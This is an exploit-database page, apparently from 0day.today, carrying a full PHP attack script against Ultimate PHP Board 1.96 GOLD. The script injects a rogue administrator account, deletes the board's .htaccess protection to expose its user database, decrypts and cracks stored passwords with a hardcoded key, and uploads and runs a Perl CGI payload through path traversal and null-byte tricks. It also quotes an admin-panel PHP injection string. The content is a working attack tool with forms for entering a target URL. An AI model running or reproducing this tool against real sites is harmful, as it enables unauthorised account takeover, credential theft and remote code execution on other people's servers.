0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ultimate PHP Board <= 1.96 GOLD Multiple Vulnerabilities Exploit
================================================================ Ultimate PHP Board <= 1.96 GOLD Multiple Vulnerabilities Exploit ================================================================ <?php //perl cgi code to inject into vulnerable system: //payload should start with [NR] and end with #; $perlPayload="[NR] use CGI qw(:standard);print header;print \" start \";print \" 0-day \";print \" exploit \"; print \" code end \";#"; $v1_xKey="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl"; //taken from ./textdb.inc.php line 324: function t_decrypt($text,$key){ $crypt = ""; for($i=0;$i<strlen($text);$i++) { $i_key = ord(substr($key, $i, 1)); $i_text = ord(substr($text, $i, 1)); $n_key = ord(substr($key, $i+1, 1)); $i_crypt = $i_text + $n_key; $i_crypt = $i_crypt - $i_key; $crypt .= chr($i_crypt); } return $crypt; } function t_encrypt($text, $key) { $crypt = ""; for($i=0;$i<strlen($text);$i++) { // print $i."key char:".substr($key, $i, 1)."<br>"; $i_key = ord(substr($key, $i, 1)); // print $i."ikey:".$i_key."<br>"; $i_text = ord(substr($text, $i, 1)); // print $i."itext:".$i_text."<br>"; $n_key = ord(substr($key, $i+1, 1)); // print $i."nkey:".$n_key."<br>"; $i_crypt = $i_text + $i_key; // print $i."T+K_crypt:".$i_crypt ."<br>"; $i_crypt = $i_crypt - $n_key; // print $i."I-N_crypt:".$i_crypt."<br>"; $crypt .= chr($i_crypt); $offset0=$i_crypt-$i_text; // print "key=$i_key - $n_key<br>"; // print "offset0:$offset0=$i_crypt-$i_text<br>"; $offset=$i_key-$n_key; //print "offset:$offset<br>"; // $broken=$i_text+$offset; // print "broken:".$broken; } return $crypt; } function gen_collision($offset, $start){//$start should be a number of an ascii char $offset_len=strlen($offset); $x=0; // print "len:".$offset_len."<br>"; // for($x=0;$x<$offset_len;$x++){//$offset as $off_int){ foreach($offset as $off_char){ if($x==0){ $newkey.=chr($start); $nextchar=$start; $x++; } // print "next char: $nextchar "."offset:".$off_char."<br>"; $tmp=$nextchar - $off_char; $newkey.=chr($tmp); $nextchar=$tmp; } return $newkey; } function gen_offset($crypt,$text){ $text_len=strlen($text); for($x=0;$x<$text_len;$x++){ // print "crypt:".substr($crypt, $x, 1).'text:'.substr($text, $x, 1).'<br>'; $cry_hex=ord(substr($crypt, $x, 1)); $txt_hex=ord(substr($text, $x, 1)); $offset[$x]=$cry_hex - $txt_hex; //print "offset".$offset."crypt".$cry_hex."text".$txt_hex[x]."<br>"; } return $offset;//numeric array } function http_gpc_send( $method, $host, $port ,$usepath,$cookie="", $postdata = "") { $fp = pfsockopen( $host, $port, &$errno, &$errstr, 120 ); # user-agent name $ua = "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"; if( !$fp ) { print "$errstr ($errno)<br>\nn"; } else { if( $method == "GET" ) { fputs( $fp, "GET $usepath HTTP/1.0\n" ); } else if( $method == "POST" ) { fputs( $fp, "POST $usepath HTTP/1.0\n" ); } fputs( $fp, "User-Agent: ".$ua."\n" ); fputs($fp, "Host: ".$host."\n"); fputs( $fp, "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n" ); fputs( $fp, "Accept-Language: en-us,en;q=0.5\n" ); fputs( $fp, "Accept-Encoding: gzip,deflate\n" ); fputs( $fp, "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n" ); fputs( $fp, "Cookie: ".$cookie."\n" ); if( $method == "POST" ) { $strlength = strlen( $postdata ); fputs( $fp, "Content-type: application/x-www-form-urlencoded\n" ); fputs( $fp, "Content-length: ".$strlength."\n\n" ); fputs( $fp, $postdata."\n\n"); } fputs( $fp, "\n\n" ); $output = ""; while( !feof( $fp ) ) { $output .= fgets( $fp, 1024 ); } fclose( $fp ); } return $output; } function getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env){ $exp_power_env="3";//admin $InjectUserPost="u_login=te".rand()."1&u_email=rew".rand()."@wfje.com&u_loca=&u_site=&avatar=images%2Favatars%2Fnoavatar.gif&u_icq=&u_aim=&u_msn=&u_sig=s%3C%7E%3E0%3C%7E%3E2006-04-20%5BNR%5D".$exp_user_env."%3C%7E%3E".$exp_pass_env."%3C%7E%3E".$exp_power_env."%3C%7E%3EA%40a.com%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E1%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E%3C%7E%3E13%3C%7E%3E%3C%7E%3E1%3C%7E%3E".$exp_id_env."&submit=Submit"; http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost); } if(isset($_REQUEST['vict'])){ $payName="data".rand().".cgi";//must be .cgi $expPost="u_name=Admin&subject=hey&icon=#!/usr/bin/perl -wT \"&message=$perlPayload&id=/../images/$payName%00"; $exp_user_env="Jockie227"; $exp_pass_env="tZbi}"; $exp_power_env="3"; $exp_id_env=4000000000+rand(0,300000000); //The script is injecting user into the database; becase of this the cookie is known before the script even contacts the vulnerable "Ultamate PHP Boar". Also note that a time stamp is not needed. $cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env"; $url_parsed = parse_url($_REQUEST['vict']); if ( empty($url_parsed['scheme']) ) { $url_parsed = parse_url('http://'.$url); } $rtn['url'] = $url_parsed; $victPort = $url_parsed["port"]; if ( !$port ) { $victPort = 80; } $victPath = $url_parsed["path"]; $victHost = $url_parsed["host"]; print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>"; print "<CENTER><B><I>0-day</I></B></CENTER>"; //injecting user into database, this information is used to verify session information getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env); //http_gpc_send("POST", $victHost, $victPort, $victPath."/register.php", "", $InjectUserPost); // http_gpc_send("GET", $victHost, $victPort, $victPath."/open.php?id=../images%00", $cookie); //uploading CGI $field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost); //making cgi executeable usei "close.php" http_gpc_send("GET", $victHost, $victPort, $victPath."/close.php?id=../images/".$payName."%00", $cookie); //executing cgi $feedBack=http_gpc_send("GET",$victHost, $victPort, $victPath."/images/".$payName); $field = str_replace("<", "<", $field); $field = str_replace(">", ">", $field); // print $field; print $feedBack; exit; }elseif(isset($_REQUEST['victHTA'])){ $expPost="u_name=#&message=#&id=/.htaccess%00"; $exp_user_env="Jockie227"; $exp_pass_env="tZbi}"; $exp_power_env="3"; $exp_id_env=4000000000+rand(0,300000000); //The script is injecting user into the database; becase of this the cookie is known before the script even contacts the vulnerable Ultamate PHP Board. Also note that a time stamp is not needed. $cookie="user_env=$exp_user_env; pass_env=$exp_pass_env; power_env=$exp_power_env; id_env=$exp_id_env"; $url_parsed = parse_url($_REQUEST['victHTA']); if ( empty($url_parsed['scheme']) ) { $url_parsed = parse_url('http://'.$url); } $rtn['url'] = $url_parsed; $victPort = $url_parsed["port"]; if ( !$port ) { $victPort = 80; } $victPath = $url_parsed["path"]; $victHost = $url_parsed["host"]; //injecting user into database, this information is used to verify session information getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,$exp_id_env); // $field=http_gpc_send("POST", $victHost, $victPort, $victPath."/newpost.php?a=1&t=1&page=1", $cookie, $expPost); // $field = str_replace("<", "<", $field); // $field = str_replace(">", ">", $field); // print $field; print "<script>window.location=\"".$_REQUEST['victHTA']."/db/\";</script>" ; exit; }else if(isset($_REQUEST['addVict'])){ $url_parsed = parse_url($_REQUEST['addVict']); if ( empty($url_parsed['scheme']) ) { $url_parsed = parse_url('http://'.$url); } $rtn['url'] = $url_parsed; $victPort = $url_parsed["port"]; if ( !$port ) { $victPort = 80; } $victPath = $url_parsed["path"]; $victHost = $url_parsed["host"]; $exp_user_env=$_REQUEST["addName"]; $exp_pass_env=t_encrypt($_REQUEST["addPass"],$v1_xKey); getAdmin($victHost, $victPort, $victPath, $exp_user_env,$exp_pass_env,4000000000+rand(0,300000000)); print "<title> Ultamate PHP Board Remote Code EXEC 0-Day </title>"; print "<CENTER><B> Admin login Name:".$_REQUEST["addName"]."</B></CENTER>";//this exploit code suffers from xss! print "<CENTER><B> Admin login Password:".$_REQUEST["addPass"]."</B></CENTER>"; exit; }else if(isset($_REQUEST['decrypt'])){ print "<I>ecrypted password:</I>"; print "<CENTER>".$_REQUEST["decrypt"]."</CENTER>"; print "<B>Decrypted password:</B>"; print "<CENTER><B>".t_decrypt($_REQUEST["decrypt"],$v1_xKey)."</B></CENTER>"; exit; }else if(isset($_REQUEST['encrypt'])){ print "<I>ecrypted password:</I>"; print "<CENTER>".$_REQUEST["encrypt"]."</CENTER>"; print "<B>Decrypted password:</B>"; print "<CENTER><B>".t_encrypt($_REQUEST["encrypt"],$v1_xKey)."</B></CENTER>"; // print get_key(t_encrypt($_REQUEST["encrypt"],$v1_xKey),$_REQUEST["encrypt"]); exit; }else if(isset($_REQUEST['cypher'])&&isset($_REQUEST['plain'])){ $cypher_len=strlen($_REQUEST['cypher']); $offset=gen_offset($_REQUEST['cypher'],$_REQUEST['plain']); print "Offset:"; for($x=0;$x<$cypher_len;$x++){ print $offset[$x].':'; } print '<br>'; $validKeys=0; $y=0; for($y=255;$y>=0;$y--){ $newKey[$y]=gen_collision($offset,$y); $key_len=strlen($newKey[$y]); print "<br>Key:$y = "; for($x=0;$x<=$key_len;$x++){ print $newKey[$y][$x]; } print "<br>Cypher:".t_encrypt($_REQUEST['plain'],$newKey[$y]); print "<br>Plain :".t_decrypt($_REQUEST['cypher'],$newKey[$y])."<br><br>"; } exit; } print "<title> Ultimate PHP Board Remote Code EXEC 0-Day </title> <CENTER><B><I>0-day</I></B></CENTER> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> <B><I>Get Admin</I></B><br> <B>Inject an administrative account into UPB:</B> <p> <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> <p> Path to attack:<i>(example: http://www.domain.ext/PathToUPB)</i><br> <input name=\"addVict\" type=\"text\" size=60> <br> Inject Name:<br> <input name=\"addName\" type=\"text\" size=60> <br> Inject Password:<br> <input name=\"addPass\" type=\"text\" size=60> <br> <p> <input type=\"submit\" value=\"Inject Admin\"> </form> <p> <B>PHP code injection is possilbe in the admin panel without an exploit. Both admin_config.php and admin_config2.php can be used to execute PHP by tagging on: ' \";phpinfo(); \$crap=\"1 ' to any of the config values </B>( double quotes \" are only used in exploit)</B> <p> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> <B><I>Gain Read Access To The Database</I></B> <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> <p> Removes /db/.htaccess to allow access to the remote target's flat file database:<i>(example: http://www.domain.ext/PathToUPB [no trailing slash]) (user database in /db/users.dat) </i><br><br> <input name=\"victHTA\" type=\"text\" size=60> <br> <p> <input type=\"submit\" value=\"Attack\"> </form> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> <B><I>Crypto</I></B> <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> <p> Plain Text Password:<br> <input name=\"encrypt\" type=\"text\" size=60> <br> <p> <input type=\"submit\" value=\"Encrypt\"> </form> <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> Encrypted Password:<br> <input name=\"decrypt\" type=\"text\" size=60> <br> <p> <input type=\"submit\" value=\"Decrypt\"> </form> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> <p> Plain Text:<br> <input name=\"plain\" type=\"text\" size=60> <br> <p> corosponding cypher text:<br> <input name=\"cypher\" type=\"text\" size=60> <br> <p> <input type=\"submit\" value=\"crack key\"> </form> ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------<br> <B><I>Proof of Concept Only, Unstable Remote Code Execution Using NON-SQL Database Injection</I></B> <form ACTION=".$_SERVER['PHP_SELF']." method=\"post\"> <p> perl CGI Code Injection Attack Remote Target:<br> <input name=\"vict\" type=\"text\" size=60> <br> <p> <input type=\"submit\" value=\"Attack\"> </form> <B>http://www.domain.ext/PathToUPB (no trailing slash)</B> </body>"; ?> # 0day.today [2024-12-24] #